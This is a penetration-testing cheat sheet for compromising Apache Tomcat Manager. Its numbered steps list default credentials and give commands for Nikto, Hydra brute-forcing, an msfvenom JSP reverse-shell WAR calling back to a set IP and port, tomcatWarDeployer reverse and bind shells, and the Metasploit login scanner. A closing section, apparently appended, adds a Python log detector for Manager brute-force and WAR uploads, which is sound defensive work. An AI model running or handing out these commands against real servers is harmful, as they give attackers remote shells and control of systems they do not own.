1. Check Default Directories
http://10.10.10.10:8080/manager
http://10.10.10.10:8080/manager.html
2. Check for Default Credentials
Some common default usernames and passwords are:
Username List: admin, tomcat, manager, root
Password List: manager, password, root, tomcat, s3cret
3. Run Nikto Scan
nikto -h http://10.10.10.10:8080
4. Generate Reverse Shell Payload
sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.112 LPORT=1234 -f war -o shelly.war
5. Brute Force with Hydra
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.10 http-get /manager/html
6. Using tomcatWarDeployer.py for Upload
The tomcatWarDeployer.py script can automate the process of uploading and deploying a reverse shell .war file to Tomcat. Clone the repository and use the script as follows:
sudo git clone https://github.com/mgeeky/tomcatWarDeployer.git
cd tomcatWarDeployer
To deploy a reverse shell:
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:8080/manager/html/
<username>: The username for authentication.
<password>: The password for authentication.
<ATTACKER_IP>: The attacking machine's IP address.
<ATTACKER_PORT>: The port the reverse shell should connect back to.
<VICTIM_IP>: The target's IP address.
For a bind shell instead of a reverse shell:
./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <VICTIM_IP>:8080/manager/html/
7. Scan with Metasploit
Metasploit has an auxiliary scanner that can quickly check the Tomcat Manager login for default or weak credentials:
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 10.10.10.10
set USERNAME tomcat
set PASSWORD password
run
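As an added defensive counterpart to the Hydra, tomcatWarDeployer.py and Metasploit steps above (example code written for this page, not taken from it or from any of the tools it names): a small Python detector run over constructed Tomcat access-log lines in the default "common" format, flagging a burst of 401s against /manager from one source, a successful Manager login immediately after those failures, and a Manager upload/deploy request. The threshold, time window and sample lines are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
FAIL_THRESHOLD, WINDOW = 4, 60   # assumed: 401s on /manager per source IP within WINDOW seconds

# Constructed sample log (not real traffic): failed-login burst, then success, then WAR upload.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:15:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [12/Mar/2024:10:15:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [12/Mar/2024:10:15:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [12/Mar/2024:10:15:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - tomcat [12/Mar/2024:10:15:04 +0000] "GET /manager/html HTTP/1.1" 200 18921
10.0.0.5 - tomcat [12/Mar/2024:10:15:09 +0000] "POST /manager/html/upload HTTP/1.1" 303 -
10.0.0.9 - - [12/Mar/2024:10:20:00 +0000] "GET /index.html HTTP/1.1" 200 11156
"""

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # not a common-format access-log line
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], TS_FMT)
    d["status"] = int(d["status"])
    return d

def detect(log_text):
    """Return (source_ip, alert_name) tuples for suspicious Manager activity."""
    alerts = []
    fails = defaultdict(list)  # ip -> timestamps of 401s against /manager
    for line in log_text.splitlines():
        ev = parse(line)
        if not ev or not ev["path"].startswith("/manager"):
            continue  # only requests to the Manager app are of interest here
        ip, ts = ev["ip"], ev["ts"]
        if ev["status"] == 401:
            fails[ip].append(ts)
            recent = [t for t in fails[ip] if (ts - t).total_seconds() <= WINDOW]
            if len(recent) == FAIL_THRESHOLD:   # fire once, when the threshold is reached
                alerts.append((ip, "manager-bruteforce"))
        elif ev["status"] < 400 and fails[ip]:  # a success right after a run of failures
            alerts.append((ip, "manager-login-after-failures"))
            fails[ip] = []
        if ev["method"] in ("PUT", "POST") and ("/upload" in ev["path"] or "/deploy" in ev["path"]):
            alerts.append((ip, "manager-war-deploy"))  # HTML upload form or text/deploy
    return alerts
```

Pointing detect() at a real localhost_access_log file and forwarding the alerts to a SIEM is the natural next step; the thresholds should be tuned to how often legitimate administrators actually use the Manager app.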